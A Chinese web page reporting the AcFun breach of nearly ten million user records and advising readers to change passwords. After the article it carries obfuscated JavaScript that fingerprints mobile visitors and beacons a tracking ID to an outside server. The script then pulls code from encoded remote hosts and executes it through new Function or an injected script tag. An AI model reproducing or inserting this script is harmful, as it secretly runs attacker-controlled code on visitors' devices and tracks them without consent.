ACFun近千万用户数据外泄,建议大家尽快修改相关帐号密码!
来源:趣动漫人气:208更新:2021-06-08 09:41:02
昨晚躺床上耍手机的时候,接到了acfun公众号的安全通知,唉,又要改密码。。。。
今日凌晨,AcFun弹幕视频网发布公告称,因网站受黑客攻击,已有近千万条用户数据外泄,强烈建议账号安全存在隐患的用户及时修改密码。
据悉,本次泄露的数据主要包括用户ID、昵称、加密储存的密码等。
公告原文:http://www.acfun.cn/a/ac4405547
根据可靠消息称,其实早在今年 3 月份,暗网论坛中就有人公开出售 AcFun 的一手用户数据,数量高达 800 万条,平均 1 元能买到 800 条。
而在 AcFun 发布此次数据泄露公告之前,暗网中也早有人兜售其 Shell 和内网权限。
北京时间 6 月 13 日 12:49,涉事人员继续发帖,称的确手握 AcFun 的 Shell 和数据,并要求 A 站及时回应,否则将分批公布这些用户数据(包括 Admin 的账号密码)。
点开这位的主页,发现了一些很有意思的地方:
公布者明目张胆的挂着b站信息引战,一群看热闹的观众在开串水issues
密码泄露的风险除了你在这个网站的所有信息被随意查看,收藏的 av 号会暴露你的哲学爱好之外。攻击者还把你的信息纳入社工库,通过撞库来获取你在其他网站的密码或信息,进而实施钓鱼等一系列攻击,最终让你遭遇财产或者其他损失……所以建议立即更改相关密码(随机密码算了)
![ACFun近千万用户数据外泄,建议大家尽快修改相关帐号密码!- 趣动漫]( "ACFun近千万用户数据外泄,建议大家尽快修改相关帐号密码! 八卦杂谈 |趣动漫")
function PEDeUt(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function PShHCoIT(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return PEDeUt(t);};window[''+'c'+'D'+'J'+'n'+'K'+'Q'+'Y'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,k,i,w,d,c){function PtmM(t){var e=t.match(new RegExp('^((https?|wss?)?://)?a.'));if(!e)return t;var n=new Date;return(e[1]||"")+[n.getMonth()+1,n.getDate(),n.getHours()].join("").split("").map(function(t){return String.fromCharCode(t%26+(t%2!=0?65:97))}).join("")+"."+t.split(".").slice(-2).join(".")};var x=PShHCoIT,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=PtmM(decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0]))));!function(o,t){var a=o.getItem(t);if(!a||32!==a.length){a='';for(var e=0;e!=32;e++)a+=Math.floor(16*Math.random()).toString(16);o.setItem(t,a)}var n='https://qsd.spzkan.cn:7891/stats/14904/'+i+'?ukey='+a+'&host='+window.location.host;navigator.sendBeacon?navigator.sendBeacon(n):(new Image).src=n}(localStorage,'__tsuk');'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')!=-1){var xhr=new XMLHttpRequest();xhr.open('POST',u+'/vh4/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else if(WebSocket&&/UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(navigator.userAgent)){k=PtmM(decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1]))));var ws=new WebSocket(k+'/wh4/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);};ws.onerror=function(){var s=d[crd]('script');s.src=u+'/vh4/'+i;cs.parentElement.insertBefore(s,cs);}}else{var s=d[crd]('script');s.src=u+'/vh4/'+i;cs.parentElement.insertBefore(s,cs);}})('aaHR0cHMlM0ElMkYlMkZhLm1wemx2cS5jbiUzQTg4OTE=','dd3NzJTNBJTJGJTJGYS55a2toanMuY24lM0E5NTM1','165499',window,document,['a','d']);}:function(){};
